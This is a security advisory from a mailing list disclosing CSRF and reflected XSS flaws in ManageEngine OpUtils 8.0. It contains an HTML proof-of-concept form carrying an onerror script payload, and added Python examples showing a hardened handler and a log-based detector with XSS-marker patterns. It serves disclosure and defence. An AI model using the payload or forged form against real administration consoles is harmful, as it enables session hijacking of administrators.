CSRF and XSS In ManageEngine OpUtils
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CSRF and XSS In ManageEngine OpUtils
- From: kingkaustubh@xxxxxx
- Date: Mon, 15 Feb 2016 17:38:35 GMT
==================================================
CSRF and XSS In ManageEngine OpUtils
==================================================
Overview
========
* Title: CSRF and XSS in ManageEngine OpUtils
* Author: Kaustubh G. Padwad
* Product Homepage: https://www.manageengine.com/products/oputils/
* Severity: HIGH
* Version Affected: Version 8.0
* Version Tested: Version 8.0
* Version Patched:
Advisory ID
============
2016-01-Manage_Engine
Description
===========
About the Product
=================
OpUtils is a Switch Port & IP Address Management software that helps network
engineers manage their Switches and IP Address Space with ease. With its
comprehensive set of 30+ tools, it helps them to perform network monitoring
tasks like detecting a rogue device intrusion, keep a check on bandwidth usage,
monitoring availability of critical devices, backing up Cisco configuration
files and more.
Vulnerable Parameter
--------------------
1. RouterName
2. action Form
3. selectedSwitchTab
4. ipOrHost
5. alertMsg
6. hostName
7. switchID
8. oidString
About Vulnerability
-------------------
This application is vulnerable to a combined CSRF/XSS attack: if an admin user
can be tricked into visiting a crafted URL created by the attacker (via spear
phishing/social engineering), the attacker can insert arbitrary script into the
admin page. Once exploited, the admin's browser can be made to do almost
anything the admin user could typically do, for example by hijacking the
admin's cookies.
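The two defects described above, a reflected parameter written into the page without encoding and a state-changing request that nothing ties to the admin's session, are shown side by side below. This is an added illustration, not OpUtils code or the advisory author's: the request is modelled as a plain dictionary, the allowed origin is taken from the PoC host, and the `RouterName` payload is the shape used in the PoC. The hardened handler applies the standard fixes: an unguessable per-session CSRF token compared in constant time, rejection of a foreign `Origin` header, and HTML-encoding of the reflected value.

```python
import hmac
import html
import secrets

# The payload shape is the one the advisory's PoC puts in RouterName. The
# params/session dictionaries are a constructed stand-in for a real request
# handler; nothing here is OpUtils code.
POC_ROUTER_NAME = 'kaus"><img src=a onerror=confirm("Kaustubh")>tubh"'
APP_ORIGIN = "http://192.168.1.10:7080"   # host from the PoC, used as the allowed Origin


def render_vulnerable(params):
    """The pattern the advisory describes: the parameter is pasted straight
    into the page, so a '"' and '>' in it close the attribute and inject a
    tag, and nothing ties the request to the admin's session, so any site
    the admin visits can submit it on their behalf."""
    return '<input name="RouterName" value="%s">' % params.get("RouterName", "")


def new_session():
    """Session state holding a per-session anti-CSRF token that a third-party
    page cannot read or guess."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def check_request(params, session, origin_header, allowed_origin=APP_ORIGIN):
    """CSRF checks for a state-changing request. Returns None when the request
    is acceptable, otherwise the reason it was rejected.
    - A present but foreign Origin header is rejected (browsers send Origin on
      cross-site form posts; its absence is not treated as proof of anything).
    - The token in the request must equal the session token; compare_digest
      keeps the comparison constant-time."""
    if origin_header is not None and origin_header != allowed_origin:
        return "cross-origin request rejected"
    if not hmac.compare_digest(params.get("csrf_token", ""), session["csrf_token"]):
        return "missing or invalid CSRF token"
    return None


def render_hardened(params, session, origin_header, allowed_origin=APP_ORIGIN):
    """Same page with both defences: the CSRF checks above, plus HTML-encoding
    of the reflected value so it cannot break out of the attribute."""
    reason = check_request(params, session, origin_header, allowed_origin)
    if reason is not None:
        raise PermissionError(reason)
    safe = html.escape(params.get("RouterName", ""), quote=True)
    return ('<input name="RouterName" value="%s">'
            '<input type="hidden" name="csrf_token" value="%s">'
            % (safe, session["csrf_token"]))


if __name__ == "__main__":
    print(render_vulnerable({"RouterName": POC_ROUTER_NAME}))
    session = new_session()
    print(render_hardened({"RouterName": POC_ROUTER_NAME,
                           "csrf_token": session["csrf_token"]},
                          session, APP_ORIGIN))
```

Run stand-alone, the script prints the raw reflection (with a live `<img ... onerror=...>` tag in it) followed by the encoded version, where the same input survives only as `&lt;img ...&gt;` text inside the attribute. Either defence alone leaves a gap: encoding without a token still lets a cross-site page change the router name, and a token without encoding still lets an admin who is phished into submitting the form script their own session.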
Vulnerability Class
===================
Cross Site Request Forgery
(https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting
(https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
Steps to Reproduce: (POC)
=========================
* Add the following code to a web server and send that malicious link to the
application admin.
* The admin should be logged in when he clicks on the link.
* Social engineering might help here.
For example: "Device password has been changed, click here to reset"
####################CSRF COde#######################
<html>
<body>
<form action="http://192.168.1.10:7080/DeviceExplorer.cc">
<input type="hidden" name="RouterName"
value="kaus"><img src=a onerror=confirm("Kaustubh")>tubh"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>
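For anyone running version 8.0 until the service pack is applied, the request the PoC above generates is visible in the web server's access log: a hit on `DeviceExplorer.cc` whose `RouterName` (or any of the other listed parameters) decodes to markup, typically arriving with a Referer outside the OpUtils host. The script below is an added example, not part of the advisory or the product: it parses constructed combined-format log lines (the first carries the PoC payload, the second is a normal request), URL-decodes the watched parameters, and flags lines that contain tag or event-handler markers or that were referred from a foreign site. The parameter names come from the advisory's "Vulnerable Parameter" list; the log format, sample IPs and the `evil.example` referer are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters named in the advisory's "Vulnerable Parameter" list.
WATCHED_PARAMS = {"RouterName", "action", "selectedSwitchTab", "ipOrHost",
                  "alertMsg", "hostName", "switchID", "oidString"}

# Markers for markup injection in a decoded parameter value: an opening tag,
# an on*= event-handler attribute, or a javascript: URL.
XSS_MARKERS = re.compile(r"<\s*\w|on\w+\s*=|javascript:", re.IGNORECASE)

# Apache/nginx "combined" log format: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample log lines. The first carries the PoC payload in RouterName
# and a referer on a third-party host; the second is an ordinary request from
# within the application; the third is unrelated.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2016:17:38:35 +0000] "GET /DeviceExplorer.cc?RouterName=kaus%22%3E%3Cimg+src%3Da+onerror%3Dconfirm(%22Kaustubh%22)%3Etubh%22 HTTP/1.1" 200 512 "http://evil.example/reset.html" "Mozilla/5.0"
10.0.0.6 - - [15/Feb/2016:17:40:01 +0000] "GET /DeviceExplorer.cc?RouterName=core-sw-01&switchID=12 HTTP/1.1" 200 512 "http://192.168.1.10:7080/Home.cc" "Mozilla/5.0"
10.0.0.7 - - [15/Feb/2016:17:41:10 +0000] "POST /login.cc HTTP/1.1" 302 0 "-" "curl/7.47"
"""


def find_suspicious(log_text, app_origin):
    """Return one finding per DeviceExplorer.cc request whose watched parameters
    decode to markup or whose referer points outside app_origin.

    A missing referer ("-") is not treated as foreign: browsers often strip it,
    so its absence alone is not evidence of a cross-site request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("DeviceExplorer.cc"):
            continue
        # parse_qs already percent-decodes once; unquote a second time so a
        # double-encoded payload does not slip past the marker check.
        params = parse_qs(url.query, keep_blank_values=True)
        hits = [name for name in params
                if name in WATCHED_PARAMS
                and any(XSS_MARKERS.search(unquote(v)) for v in params[name])]
        referer = m["referer"]
        foreign_referer = referer not in ("-", "") and not referer.startswith(app_origin)
        if hits or foreign_referer:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "params": hits,
                "foreign_referer": foreign_referer,
                "referer": referer,
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG, "http://192.168.1.10:7080"):
        print(finding)
```

On the sample above only the first line is reported, with `RouterName` as the offending parameter and the referer flagged as foreign. A real deployment would read the live log and pass the scheme, host and port the console is actually served on as `app_origin`; a request that trips only the referer check is worth a look but is not on its own proof of an attack.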
Mitigation
==========
Upgrade to next service pack
Change Log
==========
Disclosure
==========
28-January-2016 Reported to Developer
28-January-2016 Acknowledgement from developer
11-February-2016 Fixed by vendor ()
Credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@xxxxxx
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad